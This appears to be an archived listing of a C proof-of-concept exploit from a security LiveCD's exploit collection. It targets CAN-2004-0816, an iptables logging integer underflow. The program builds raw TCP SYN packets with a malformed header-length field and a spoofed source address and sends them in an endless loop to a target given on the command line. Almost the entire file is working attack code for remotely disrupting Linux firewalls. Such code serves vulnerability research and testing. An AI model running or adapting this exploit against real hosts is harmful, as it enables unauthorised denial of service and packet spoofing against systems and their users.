home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / remote / iptableslogintegeroverflowpoc.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  4KB  |  221 lines

---

1. /* 
2. * 
3. * iptables.log.integer.underflow.POC.c 
4. * 
5. * (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
6. *
7. * felix__zhou _at_ hotmail _dot_ com
8. *
9. * */
10.  
11. #include <stdio.h>
12. #include <winsock2.h>
13. #include <ws2tcpip.h>
14. #include <time.h>
15.  
16. #pragma comment(lib,"ws2_32")
17.  
18. static unsigned char dip[4];
19. static unsigned int da;
20. static unsigned short dp;
21. static unsigned char dport[2];
22.  
23. static unsigned char sip[4];
24. static unsigned int sa;
25. static unsigned short sp;
26. static unsigned char sport[2];
27.  
28. /*
29. static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
30. {
31. unsigned int csum = 0;
32. unsigned char *p = ip;
33.  
34. while (1 < size) {
35. csum += (p[0] << 8) + p[1];
36. p += 2;
37. size -= 2;
38. }
39.  
40. if (size) 
41. csum += *p;
42.  
43. csum = (csum >> 16) + (csum & 0xffff);
44. csum += (csum >> 16);
45.  
46. sum[0] = (((unsigned short)(~csum)) >> 8);
47. sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
48. }
49. */
50.  
51. static void tcp_csum(unsigned char *tcp, unsigned char *ip, 
52. unsigned int size, unsigned char *sum)
53. {
54. unsigned int csum = 0;
55. unsigned char *p = tcp;
56.  
57. while (1 < size) {
58. csum += (p[0] << 8) + p[1];
59. p += 2;
60. size -= 2;
61. }
62.  
63. csum += (ip[12] << 8) + ip[13];
64. csum += (ip[14] << 8) + ip[15];
65.  
66. csum += (ip[16] << 8) + ip[17];
67. csum += (ip[18] << 8) + ip[19];
68.  
69. csum += 0x06;
70. csum += 0x14;
71.  
72. if (size) 
73. csum += *p;
74.  
75. csum = (csum >> 16) + (csum & 0xffff);
76. csum += (csum >> 16);
77.  
78. sum[0] = (((unsigned short)(~csum)) >> 8);
79. sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
80. }
81.  
82. static int work(SOCKET s)
83. {
84. DWORD ret = 1;
85. unsigned char buf[1500];
86. unsigned char *ip;
87. unsigned char *tcp;
88. unsigned int seq = 0x01;
89. struct sockaddr_in host;
90.  
91. ZeroMemory(buf, 1500);
92.  
93. ip = buf;
94. tcp = buf + 20;
95.  
96. ip[0] = 0x45; /* ver & hlen */
97. ip[3] = 0x28; /* tlen */
98. ip[8] = 0x80; /* ttl */
99. ip[9] = 0x06; /* protocol */
100. ip[10] = ip[11] = 0;
101. ip[12] = sip[0]; /* saddr */
102. ip[13] = sip[1];
103. ip[14] = sip[2];
104. ip[15] = sip[3];
105. ip[16] = dip[0]; /* daddr */
106. ip[17] = dip[1];
107. ip[18] = dip[2];
108. ip[19] = dip[3];
109.  
110. tcp[0] = sport[0];
111. tcp[1] = sport[1];
112. tcp[2] = dport[0]; /* dport */
113. tcp[3] = dport[1];
114. tcp[12] = 0x40; /* hlen */ /* HERE */
115. tcp[13] = 0x02; /* flags */
116.  
117. ZeroMemory(&host, sizeof(struct sockaddr_in));
118. host.sin_family = AF_INET;
119. host.sin_port = dp;
120. host.sin_addr.s_addr = da;
121.  
122. for (;; ) {
123. tcp[4] = (seq >> 24); /* seq number */
124. tcp[5] = ((seq << 8) >> 24);
125. tcp[6] = ((seq << 16) >> 24);
126. tcp[7] = ((seq << 24) >> 24);
127. tcp[16] = tcp[17] = 0;
128. seq ++;
129.  
130. tcp_csum(tcp, ip, 0x14, tcp + 16);
131.  
132. if (SOCKET_ERROR == sendto(s, buf, 0x28, 0, 
133. (SOCKADDR *)&(host), sizeof host)) {
134. if (WSAEACCES != WSAGetLastError()) {
135. printf("sendto() failed: %d\n", 
136. WSAGetLastError());
137.  
138. ret = 1;
139. } else {
140. printf("You must be Administrator!\n");
141. }
142.  
143. break;
144. }
145. }
146.  
147. return ret;
148. }
149.  
150. static char usage[] = "Usage: %s dip dport sip sport\n";
151.  
152. int main(int argc, char **argv)
153. {
154. WORD ver = MAKEWORD(2, 2);
155. WSADATA data;
156. unsigned char *p;
157. SOCKET s;
158. int ret = 1;
159. BOOL eopt = TRUE;
160.  
161. if (5 != argc) {
162. printf(usage, argv[0]);
163. goto out;
164. }
165.  
166. if (INADDR_NONE == (da = inet_addr(argv[1]))) {
167. printf("dest ip address is NOT valid!\n");
168. printf(usage, argv[0]);
169. goto out;
170. }
171.  
172. p = (unsigned char *)&da;
173. dip[0] = p[0];
174. dip[1] = p[1];
175. dip[2] = p[2];
176. dip[3] = p[3];
177.  
178. dp = atoi(argv[2]);
179. dport[0] = ((dp << 16) >> 24);
180. dport[1] = ((dp << 24) >> 24);
181.  
182. if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
183. printf("source ip address is NOT valid!\n");
184. printf(usage, argv[3]);
185. goto out;
186. }
187.  
188. p = (unsigned char *)&sa;
189. sip[0] = p[0];
190. sip[1] = p[1];
191. sip[2] = p[2];
192. sip[3] = p[3];
193.  
194. sp = atoi(argv[4]);
195. sport[0] = ((sp << 16) >> 24);
196. sport[1] = ((sp << 24) >> 24);
197.  
198. srand((unsigned int)time(0));
199.  
200. if (WSAStartup(ver, &data)) {
201. printf("WSAStartup() failed\n");
202. goto out;
203. }
204.  
205. if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) 
206. goto err;
207.  
208. if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, 
209. (char *)&eopt, sizeof(eopt)))
210. goto err1;
211.  
212. work(s);
213.  
214. err1:
215. closesocket(s);
216. err:
217. WSACleanup();
218.  
219. out:
220. return ret;
221. }